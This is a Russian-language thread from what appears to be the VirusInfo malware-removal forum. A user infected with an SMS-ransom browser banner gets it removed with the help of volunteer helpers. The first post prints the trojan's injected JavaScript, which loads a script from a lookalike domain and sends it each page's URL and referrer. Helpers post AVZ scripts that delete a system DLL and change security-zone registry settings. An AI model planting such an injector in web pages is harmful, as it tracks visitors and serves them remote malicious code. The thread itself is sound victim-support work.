Показано с 1 по 7 из 7.

Всплывающий порнобаннер смс-блокер во всех браузерах (заявка № 102700)

  1. #1
    Junior Member Репутация
    Регистрация
    26.05.2011
    Сообщений
    3
    Вес репутации
    25

    Thumbs up Всплывающий порнобаннер смс-блокер во всех браузерах

    Здравствуйте уважаемое сообщество!

    Подцепил баннер-блокер браузеров во время посещения какого то левого файлохранилища, лазая за бесплатным софтом. Требует отправить смс на номер 3381 с кодом 2262454779.

    Стоял антивирус Аваст. Пробовал утилиты Доктор Веб и Касперского из рекомендаций в Правилах. Не помогли. Также пробовал воспользоваться деблокером Касперского. Код не подошел.

    Скриншот порнобаннера в приложении. Ниже - ява-скрипт, который троян-вымогатель приписывает ко всем отображаемым в браузерах страницах перед закрывающим тегом body.


    Код HTML:
    <script>if(self==top){
    document.write("<script src='http" +
    (("https:" == document.location.protocol) ? "s" : "") +
    "://qocgle.com/loPtfdn3dSasoicn/js.php?t=stat&ran="+encodeURIComponent("eZR14pZi2f7tDUSxEA7BP+RKqJRMlEAYwOl2ZCPLcmMbBIt1ua2MIC7qQU28kskI")+"&r="+escape(document.referrer)+"&u="+escape(document.URL)+"&v=351&"+Math.random()+"'>"+unescape("%3C/script%3E"));}</script></body>
    Последний раз редактировалось thyrex; 27.05.2011 в 00:17.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,465
    Вес репутации
    343
    Уважаемый(ая) Alexey_K, спасибо за обращение на наш форум!

    Помощь в лечении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    26.12.2006
    Адрес
    Vladivostok
    Сообщений
    23,299
    Вес репутации
    1555
    Отключите восстановление системы!
    Выполните скрипт в AVZ:
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(True);
     QuarantineFile('C:\WINDOWS\system32\gdzrnud.dll','');
     DeleteFile('C:\WINDOWS\system32\gdzrnud.dll');
    BC_ImportDeletedList;
    ExecuteSysClean;
    BC_Activate;
    RebootWindows(true);
    end.
    Компьютер перезагрузится.
    Пришлите карантин согласно приложению 3 правил
    (загружать тут: http://virusinfo.info/upload_virus.php?tid=102700).

    Обновите базы AVZ и сделайте новые логи.
    I am not young enough to know everything...

  5. #4
    Junior Member Репутация
    Регистрация
    26.05.2011
    Сообщений
    3
    Вес репутации
    25
    Здравствуйте, спасибо за помощь!
    Скрипт запустил. Компьютер перегрузился. Баннер из браузеров исчез.

    Цитата Сообщение от Bratez Посмотреть сообщение
    Обновите базы AVZ и сделайте новые логи.
    Логи прилагаю к ответу.

    Цитата Сообщение от Bratez Посмотреть сообщение
    Пришлите карантин
    В открыв просмотр карантина согласно инструкции, никаких файлов там почему то не обнаружил.

  6. #5
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    23.06.2009
    Адрес
    Пермь
    Сообщений
    11,186
    Вес репутации
    528
    - Выполните скрипт в AVZ
    Код:
    begin
     DeleteFileMask(GetAVZDirectory + 'Quarantine', '*.*', true);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 1);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
     RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
     ExecuteWizard('TSW', 2, 2, true);
     ExecuteWizard('SCU', 2, 2, true);
     RebootWindows(true);
    end.
    После перезагрузки:
    - Сделайте повторный лог virusinfo_syscheck.zip;
    что с проблемой?

  7. #6
    Junior Member Репутация
    Регистрация
    26.05.2011
    Сообщений
    3
    Вес репутации
    25
    Цитата Сообщение от polword Посмотреть сообщение
    - Выполните скрипт в AVZ
    - Сделайте повторный лог virusinfo_syscheck.zip;
    что с проблемой?
    2-й скрипт выполнил. Проблема с баннером исчезла еще вчера после выполнения 1-го скрипта. Лог прилагаю. Спасибо за помощь!

  8. #7
    Senior Member Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    26.12.2006
    Адрес
    Vladivostok
    Сообщений
    23,299
    Вес репутации
    1555
    Чисто.
    I am not young enough to know everything...

  • Уважаемый(ая) Alexey_K, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Webalta во всех браузерах
      От gur87 в разделе Помогите!
      Ответов: 5
      Последнее сообщение: 16.06.2012, 12:53
    2. Банеры во всех браузерах
      От ShadyRover в разделе Помогите!
      Ответов: 3
      Последнее сообщение: 05.04.2012, 14:47
    3. Порнобаннер в браузерах
      От Reposlav в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 18.03.2011, 00:18
    4. Ответов: 4
      Последнее сообщение: 10.11.2010, 12:14
    5. Порнобаннер во всех браузерах
      От duh1985 в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 14.10.2009, 14:02

    Метки для этой темы

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01300 seconds with 16 queries